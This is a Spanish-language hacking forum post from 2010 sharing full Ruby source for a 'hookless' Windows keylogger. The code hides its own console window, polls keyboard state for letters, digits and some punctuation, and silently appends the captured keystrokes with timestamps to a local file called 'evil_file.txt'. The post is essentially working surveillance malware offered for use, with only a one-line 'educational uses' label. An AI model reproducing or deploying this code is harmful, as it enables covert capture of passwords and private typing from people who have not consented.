Visitante
Ingresar
Registrarse
Underc0de - Hacking y seguridad informática
Menu
Inicio
Website
Blog
Buscar
Calendario
Ingresar
Registrarse
Underc0de - Hacking y seguridad informática
»
Programación Scripting
»
Ruby
Keylogger
Imprimir
Páginas: [
1
]
Ir Abajo
« anterior
próximo »
Keylogger
0 Respuestas
1802 Vistas
0 Usuarios y 1 Visitante están viendo este tema.
ANTRAX
Administrator
Mensajes: 5705
Actividad:
26.67%
Country:
Reputación 37
ANTRAX
Skype: underc0de.org
Twitter: @Underc0de
Keylogger
en: Febrero 24, 2010, 04:10:00 pm
Código: Ruby
# a simple hookless keylogger, tested on winxp
# written by nobot (for educational uses)
require
'Win32API'
#hide the console window.
win = Win32API.
new
(
'kernel32'
,
'GetConsoleWindow'
,
[
]
,
'L'
)
.
call
Win32API.
new
(
'user32'
,
'ShowWindow'
,
[
'p'
,
'i'
]
,
'i'
)
.
call
(
win,
0
)
#hash mapping of interesting characters to virtual keycodes
keys =
Hash
[
' '
=>
0x20,
','
=>
0xBC,
'.'
=>
0xBE
]
(
0x30 .. 0x39
)
.
each
{
|
v
|
keys
[
v
-
0x30
]
= v
}
#numerals 0-9
(
0x41 .. 0x5A
)
.
each
{
|
v
|
keys
[
v.
chr
]
= v
}
#letters A-Z
GetAsyncKeyState = Win32API.
new
(
'user32'
,
'GetAsyncKeyState'
,
[
'i'
]
,
'i'
)
keys.
each_value
{
|
v
|
GetAsyncKeyState.
call
(
v
)
}
file =
File
.
open
(
'evil_file.txt'
,
'a'
)
file.
puts
"
\n
"
+
Time
.
now
.
to_s
while
true
break
if
GetAsyncKeyState.
call
(
0x1B
)
&
0x01 ==
1
#esc
keys.
each
{
|
k, v
|
file.
print
k
if
GetAsyncKeyState.
call
(
v
)
&
0x01 ==
1
}
sleep
0.1
end
file.
close
«
Última modificación: Julio 31, 2014, 09:46:42 pm por Expermicid
»
En línea
Imprimir
Páginas: [
1
]
Ir Arriba
« anterior
próximo »
Similar topics (2)
[Ruby] Simple Keylogger
Iniciado por
BigBear
Respuestas: 0
Vistas: 2318
Julio 03, 2011, 09:32:00 pm
por
BigBear
Keylogger in ruby
Iniciado por
ANTRAX
Respuestas: 0
Vistas: 2489
Febrero 24, 2010, 03:58:51 pm
por
ANTRAX
Sponsors
Zerpens
Kali-Linux
Club Hacker
ANTRAX-LABS
Ingresar
×
Bienvenido(a),
Visitante
. Por favor,
ingresa
o
regístrate
. ¿Perdiste tu
email de activación
?
1 Hora
1 Día
1 Semana
1 Mes
Siempre
Ingresar con nombre de usuario, contraseña y duración de la sesión